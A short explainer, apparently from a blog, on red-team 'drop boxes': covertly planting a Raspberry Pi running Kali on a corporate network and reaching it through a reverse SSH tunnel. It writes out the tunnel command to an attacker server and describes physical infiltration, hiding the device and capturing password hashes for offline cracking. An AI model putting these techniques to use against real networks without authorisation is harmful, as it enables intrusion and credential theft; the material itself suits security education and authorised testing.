Red Teams often use "Drop Boxes". They physically infiltrate a building (dressed as cleaning staff), find a hidden ethernet port (behind a printer), and plug in a Raspberry Pi. They walk out, go home, and connect to the Pi remotely. From there, they scan the internal network.
Reverse SSH Tunnels
The Pi is inside the corporate firewall. It cannot accept incoming connections.
So, the Pi calls OUT to the hacker's server (AWS EC2).
ssh -R 8080:localhost:22 hacker@aws-server
Now the hacker logs into their AWS server and pivots down the tunnel into the Pi.
Firewalls usually block INBOUND traffic but allow OUTBOUND traffic (so employees can browse the web). This exploits that trust.
1. Kali Linux on ARM
Kali Linux has official builds for Raspberry Pi.
It runs surprisingly well.
You can run Nmap, Metasploit, and Wireshark.
Cracking passwords (Hashcat) is slow (no GPU), so you capture hashes on the Pi and upload them to a powerful rig for cracking.
2. Power Consumption
A Pi Zero can run off a battery bank for days.
It can be hidden inside a keyboard, a surge protector, or taped under a desk.